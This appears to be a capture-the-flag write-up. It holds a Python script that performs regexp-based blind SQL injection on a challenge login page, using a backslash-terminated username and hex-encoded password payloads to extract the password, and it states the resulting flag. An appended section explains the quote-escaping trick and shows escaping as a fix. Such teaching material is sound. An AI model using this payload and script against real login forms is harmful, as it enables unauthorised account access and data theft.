This challenge uses regexp-based blind SQL injection.
It can be scripted in Python:
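import string

import requests


def str2hex(s):
    # Encode the pattern as a MySQL 0x hex literal so the payload needs no quotes.
    result = ''
    for ch in s:
        result += hex(ord(ch))
    result = result.replace('0x', '')
    return '0x' + result


# Candidate characters for each position of the password.
strs = string.ascii_letters + string.digits
url = "http://44d45158-6d22-4b4c-b3f0-4209335a87f7.challenge.qsnctf.com:8081/login.php"
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'
}
payload = 'or password regexp binary {}#'

if __name__ == "__main__":
    name = ''  # password prefix recovered so far
    for i in range(1, 40):
        for j in strs:
            # Anchored pattern: known prefix plus one candidate character.
            passwd = str2hex('^' + name + j)
            payloads = payload.format(passwd)
            postdata = {
                # The trailing backslash is meant to escape the quote that
                # closes the username value in the server's query.
                'username': 'admin\\',
                'password': payloads
            }
            r = requests.post(url, data=postdata, headers=headers)
            # This response text is the true/false oracle for the guess.
            if "Maybe you are right" in r.text:
                name += j
                print(j, end='')
                break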
After guessing the password, log in to get the flag:
flag{so_3asy_sql_1nj3cti0n}
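
Why the username `admin\` matters, and what closes the hole, shown as an added example that is not part of the original write-up. The query shape in `TEMPLATE` and all function names are assumptions (the page does not show login.php), and the pattern `0x5e61` is a constructed sample in the format `str2hex` produces.

```python
# Added example, not from the original write-up. TEMPLATE is an assumed shape
# for the query in login.php; the page does not show the server-side code.
TEMPLATE = "SELECT * FROM users WHERE username='{u}' AND password='{p}'"

def string_literals(sql):
    """Values of the single-quoted literals as MySQL reads them in its default
    sql_mode: backslash escapes the next character, '' is a literal quote,
    and # outside a literal starts a comment."""
    out, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] == "#":                       # comment: skip to end of line
            nl = sql.find("\n", i)
            i = n if nl == -1 else nl
        elif sql[i] != "'":
            i += 1
        else:
            i, buf = i + 1, []
            while i < n:
                if sql[i] == "\\" and i + 1 < n:    # escaped character
                    buf.append(sql[i + 1]); i += 2
                elif sql[i:i + 2] == "''":           # doubled quote
                    buf.append("'"); i += 2
                elif sql[i] == "'":                  # closing quote
                    i += 1
                    break
                else:
                    buf.append(sql[i]); i += 1
            out.append("".join(buf))
    return out

def build_naive(u, p):
    return TEMPLATE.format(u=u, p=p)             # vulnerable: raw concatenation

def mysql_escape(v):
    # Demonstration only; prepared statements are the real fix.
    return v.replace("\\", "\\\\").replace("'", "\\'")

def build_escaped(u, p):
    return TEMPLATE.format(u=mysql_escape(u), p=mysql_escape(p))

def inputs_stay_data(sql, u, p):
    """True only if the server parses exactly two literals, equal to u and p."""
    return string_literals(sql) == [u, p]

if __name__ == "__main__":
    u, p = "admin\\", "or password regexp binary 0x5e61#"   # constructed sample
    print(string_literals(build_naive(u, p)))   # one literal swallows the AND clause
    print(inputs_stay_data(build_naive(u, p), u, p),
          inputs_stay_data(build_escaped(u, p), u, p))
```

With raw concatenation the server sees a single literal, `admin' AND password=`, and the password field is parsed as SQL; with the backslash escaped (or with bound parameters) both fields remain data.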